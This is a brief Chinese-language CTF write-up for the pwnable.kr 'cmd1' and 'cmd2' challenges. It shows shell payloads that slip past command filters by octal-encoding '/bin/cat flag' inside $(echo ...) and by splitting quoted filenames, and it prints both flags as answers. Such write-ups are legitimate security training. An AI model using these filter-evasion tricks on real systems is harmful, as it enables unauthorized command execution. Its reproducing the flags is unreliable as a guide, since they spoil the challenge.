pwnable.kr-cmd2

题目描述: Daddy bought me a system command shell. but he put some filters to prevent me from playing with it without his permission… but I wanna play anytime I want! ssh [email protected] -p2222 (pw:flag of cmd1) 这题ssh的登陆密码是cmd1的flag,登陆后查看cmd2.c的源代码: 我们看到相比cmd1还多过滤了“/”,所以这里我们需要绕过这个限制,这里有多种方法可以绕过,经过测试我们发现通过cmd2中的system可以直接执行echo,但是其他的命令都需要绝对路径才行,也就是例如whoami需要”/bin/whoami”,这样会出现”/“。这里利用echo进行绕过: 把所有的字符经过8进制编码: 然后得到编码后的字符串,最后构造payload: [email protected]:~$ ./cmd2 ‘$(echo “\057\0142\0151\0156\057\0143\0141\0164\040\0146\0154\0141\0147”)’ $(echo “\057\0142\0151\0156\057\0143\0141\0164\040\0146\0154\0141\0147”) FuN_w1th_5h3ll_v4riabl3s_haha 可以成功得到flag: FuN_w1th_5h3ll_v4riabl3s_haha

pwnable.kr-cmd1

题目描述: Mommy! what is PATH environment in Linux? ssh [email protected] -p2222 (pw:guest) cmd1.c的源码为: 看起来过滤了flag,sh,tmp,没有关系,通过shell下面指令拼接可以绕过: “/bin/cat ‘fl”ag’” [email protected]:~$ ./cmd1 “/bin/cat ‘fl”ag’” mommy now I get what PATH environment is for 🙂 所以最终的flag为: mommy now I get what PATH environment is for 🙂   这里更新一种方法: [email protected]:~$ ls cmd1 cmd1.c flag [email protected]:~$ mkdir /tmp/cmd1 [email protected]:~$ cd /tmp/cmd1 [email protected]:/tmp/cmd1$ […]